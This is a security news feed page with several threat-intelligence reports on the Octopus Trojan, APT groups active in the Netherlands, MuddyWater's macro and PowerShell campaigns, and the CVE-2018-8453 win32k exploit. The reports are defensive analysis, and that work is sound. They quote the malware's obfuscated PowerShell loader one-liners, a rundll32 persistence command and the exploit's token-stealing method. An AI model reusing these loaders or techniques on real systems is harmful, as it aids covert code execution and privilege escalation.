Malware RSS Feed

Octopus-infested seas of Central Asia

Malware Alerts - Mon, 10/15/2018 - 06:00

For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities.

The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018. In our telemetry we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking), plus Afghanistan.

In the case of Octopus, DustSquad used Delphi as their programming language of choice, which is unusual for such an actor. Among others exceptions are the Russian-language Zebrocy (Sofacy’s Delphi malware), the Hindi-language DroppingElephant and the Turkish-language StrongPity. Although we detected Octopus victims that were also infected with Zebrocy/Sofacy, we didn’t find any strong similarities and we don’t consider the two actors to be related.

What happened?

In April 2018 we discovered a new Octopus sample pretending to be communication software for a Kazakh opposition political group. The malware is packed into a ZIP file named with a timestamp from February-March 2018. DVK stands for Kazakhstan Democratic Choice, an opposition political party that is prohibited in the country. The image below shows the acronym ‘ДВК’ in Russian (Демократический Выбор Казахстана). DVK enjoys a healthy Telegram presence, making Telegram´s potential ban a hot topic in Kazakhstan. The dropper pretends to be Telegram Messenger with a Russian interface.

We couldn´t find any legitimate software that this malware appears to be impersonating; in fact, we don´t believe it exists. The Trojan uses third-party Delphi libraries like The Indy Project for JSON-based C2 communications and TurboPower Abbrevia ( for compression. Malware persistence is basic and achieved via the system registry. The server side uses commercial hosting in different countries with .php scripts deployed. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen. For more information, please contact:

Technical details

The attackers used the potential Telegram ban in Kazakhstan to push its dropper as an alternative communication software for the political opposition.

‘Telegram messenger’ establishes network module persistence in the simplest way and starts the module

We can’t confirm how this malware is being distributed, although it clearly uses some form of social engineering. This actor previously used spear phishing to spread malware.

Dropper MD5 hash 979eff03faeaeea5310df53ee1a2fc8e Name Archive contents d6e813a393f40c7375052a15e940bc67 CsvHelper.dll Legit .NET CSV files parser 664a15bdc747c560c11aa0cf1a7bf06e Telegram Messenger.exe Persistence and launcher 87126c8489baa8096c6f30456f5bef5e TelegramApi.dll Network module d41d8cd98f00b204e9800998ecf8427e Settings.json Empty Launcher MD5 hash 664a15bdc747c560c11aa0cf1a7bf06e File name Telegram Messenger.exe PE timestamp 2018.03.18 21:34:12 (GMT) Linker version 2.25 (Embarcadero Delphi)

Before any user interaction, inside the FormCreate() function the launcher checks for a file named TelegramApi.dll in the same directory. If it exists, the launcher copies the network module to the startup directory as Java.exe and runs it.

The ‘Send mailing’ button in the bottom right corner doesn’t even have a handler function

Delphi Visual Component Library (VCL) programs are based on event handlers for form elements. Such programs are extremely large (about 2.6 MB and 12,000 functions), but all this code is mostly used to handle the visual components and run-time libraries. There are only three programmer-defined handlers for controlling elements inside the Octopus launcher.

Function name Functionality FormCreate() Runs as constructor before any user activity. Makes the network module persistent via Startup directory and runs it Button1Click() Shows the explorer dialog window to choose the “mailing file” DateTimePicker1Click() Shows calendar to select the “mailing date”

There is no handler for the ‘Send mailing’ button, so the launcher pretends to be an alternative communicator that in reality does nothing. This may be because the malware is still unfinished – after all, messages sent through it could be of value to the attackers. However, we believe it is more likely that the malware was created in a hurry and the attackers decided to skip any communication features.

Network module

C2 communication scheme

MD5 hash 87126c8489baa8096c6f30456f5bef5e File name TelegramApi.dll PE timestamp 2018.02.06 11:09:28 (GMT) Linker version 2.25 (Embarcadero Delphi)

Despite the file extension, this network module is a self-sufficient portable executable file and not a dynamic-link library. The first sample checks for files with names like 1?????????.* in the user’s temporary folder and deletes any files it finds. Then it creates .profiles.ini in the Application Data directory where the malware stores its log.

HTTP request Response GET /d.php?check JSON “ok” GET /d.php?servers JSON domain name GET /i.php?check= JSON “ok” POST /i.php?query= JSON response code or command depends on POST data

First stage .php script to check connection and get C2 domain name

All network modules consist of hardcoded IP addresses belonging to commercial web-hosting services based in different countries. The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request.

After the initial connection check, the malware receives a JSON with the actual C2 domain name

Then the network module checks against the hardcoded victim’s id

The network module checks against a 32-digit hardcoded victim id and sends the gathered data to the C2 using a HTTP POST request. In terms of programming, this id is strange, because the malware simultaneously ‘fingerprints’ its victim with an MD5 hash of its system data.

JSON-based gathered data sent in a HTTP POST base64-encoded request

All communication with the C2s is based on JSON-formatted data and the HTTP protocol. For that, the developers used The Indy Project ( publicly available library as well as the third-party TurboPower Abbrevia ( for compression.

After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc. One interesting field is “vr”:”2.0″ which appears to be the malware version encoded in the communication protocol.

The ‘id’ field is the victim’s fingerprint for which the malware actively uses the Windows Management Instrumentation mechanism. The Trojan runs WMIC.exe with the following arguments:

C:\WINDOWS\system32\wbem\WMIC.exe computersystem get Name /format:list C:\WINDOWS\system32\wbem\WMIC.exe os get installdate /format:list C:\WINDOWS\system32\wbem\WMIC.exe path CIM_LogicalDiskBasedOnPartition get Antecedent,Dependent

Then the module concatenates the gathered ids and computes an MD5 hash, which will be the victim’s final id. The “act” field numbers the communication stage (0 for initial fingerprinting). After this, the HTTP POST control server returns a JSON {“rt”:”30″} and the client continues with the next “act” in the HTTP POST:

At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host.

Other software

Besides the Trojan itself, the Octopus developers used the password dumping utility fgdump.

Infrastructure MD5 hash IPs C2 domain 87126c8489baa8096c6f30456f5bef5e ee3c829e7c773b4f94b700902ea3223c 38f30749a87dcbf156689300737a094e 6e85996c021d55328322ce8e93b31088 7c0050a3e7aa3172392dcbab3bb92566 2bf2f63c927616527a693edf31ecebea d9ad277eb23b6268465edb3f68b12cb2

The most recent samples (2017-2018) of hardcoded IPs and web domains obtained from the .php script


Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware). Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.

Indicators of compromise File hashes


Domains and IPs

Auxiliary URLs to upload/download files:

The following are old indicators of compromise no longer used by this actor, but which can be used for forensic purposes:


First stage .php script placed at:

Domains returned by .php script:

Reporting an Incident

SANS Tip of the Day - Mon, 10/15/2018 - 01:00
Bad guys are very persistent, eventually anyone can make a mistake. If a phone call from the "Help Desk" doesn't sound quite right, if an email seems suspicious or if a program you installed starts acting funny, ask for help! In addition, perhaps you lost a work laptop or a USB drive. The sooner you report an incident, the sooner we can help resolve the problem.

Securely Disposing Mobile Devices

SANS Tip of the Day - Fri, 10/12/2018 - 01:00
Do you plan on giving away or selling one of your older mobile devices? Make sure you wipe or reset your device before disposing of it. If you don't, the next person who owns it will have access to all of your accounts and personal information.

Threats in the Netherlands

Malware Alerts - Thu, 10/11/2018 - 03:30


On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPWC in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red handed trying to break into the OPWC’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle-East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.


For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec), others required a bit more effort.

In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

The table below describes the number of tags that were hit per IP.

0 10,532 1 1,149 2 618 3 344 4 234 >4 938

One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP), is to find out who the victim is. We thus reversed the IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept, if it was not, we tried to find out to which organization the IP belonged.

At this point, for the entries that remained, the raw requests were retrieved against the template request made by the APT. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this was the case, the entry was kept and marked as a TP.

We also checked our APT reports for targets in the Netherlands and added these results to the review.


Using the methods described above, we found the following APTs that are or have been active in the Netherlands:


BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.


Sofacy, also known as Pawn Storm, Fancy Bear and many other names is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPWC. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.


Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our Yara rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPWC incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.


Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tools, techniques and processes (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

The Lamberts

In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.


Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.


Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

Putter Panda

In 2015, the Dutch chip maker, ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO reporter“, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

Animal Farm

Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.


Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPWC incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.

For more information on our private threat intelligence reporting service, please contact

MuddyWater expands operations

Malware Alerts - Wed, 10/10/2018 - 06:00


MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran and Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Decoy images by country Jordan

The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc


Turkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety

Turkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)

Saudi Arabia

Document signed by the Major General Pilot, commander of the Saudi Royal Air Force

KSA King Saud University (KSU) KSA King Saud University (KSU)


İnkişaf üçün görüş.doc (meeting for development)


Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers


ECP.doc National Assembly of Pakistan.doc



President.doc, E-government of Afghanistan

Technical details

Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector

The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys

The macro payload, which is Base64 encoded, does the following:

  1. Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.


  1. Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

Data:c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

Case 1: INF, SCT and text files dropped by the macro
  1. INF is launched via the advpack.dllLaunchINFSection” function.
  2. INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
  3. Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.

powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));

PowerShell one-liner

Encoded text file

Execution flow:

Case 2: VBS and text files dropped by the macro

The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

Encoded text file

Execution flow:

The PowerShell code

When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

The first thing the PowerShell code does is to disable office Macro Warnings” and “Protected View“. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.


Blacklisted process names in the malware

In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dllNtRaiseHardError” function.

CnC communication

A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.

Victim system reconnaissance

The code then tries to obtain the victim’s public IP via “”.

The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

Supported commands

upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.

  1. The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“.
  2. The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
  3. The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
  4. The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
  5. The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
  6. The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
  7. The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.

In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.


Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

Attacker deception and attribution

The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.


Chinese text found in PowerShell code in multiple samples

Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied

Translation of Chinese text

We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.


Recommendations for organizations

Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

  1. Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object.
  2. Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO.
  3. A whitelisting solution to prevent certain process child-parent execution hierarchies.

The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

  • Educate generic staff to be able to distinguish malicious behavior like phishing links.
  • Educate information security staff to have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
  • Make sure enterprise-grade patch management processes are well established and executed.

High-profile organizations should have elevated levels of cybersecurity, attacks against them are inevitable and are unlikely to ever cease.

Additional information

In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact:

Indicators of compromise MD5


File names


Domains, URLs and IP addresses


Zero-day exploit (CVE-2018-8453) used in targeted attacks

Malware Alerts - Wed, 10/10/2018 - 03:00

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoints
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab Verdicts for the artifacts in this campaign are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact:

Technical details

CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

kd> dt win32k!tagWND

+0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

/* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
#define FNID_SCROLLBAR 0x029A

#define FNID_BUTTON 0x02A1

#define FNID_FREED 0x8000 /* Window being Freed… */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel Read\Write using GDI Bitmap primitives that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

  • Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
  • Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
  • Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory

More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact:


The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.


During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.


Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise: Domains:


Shedding Skin – Turla’s Fresh Faces

Malware Alerts - Thu, 10/04/2018 - 12:00

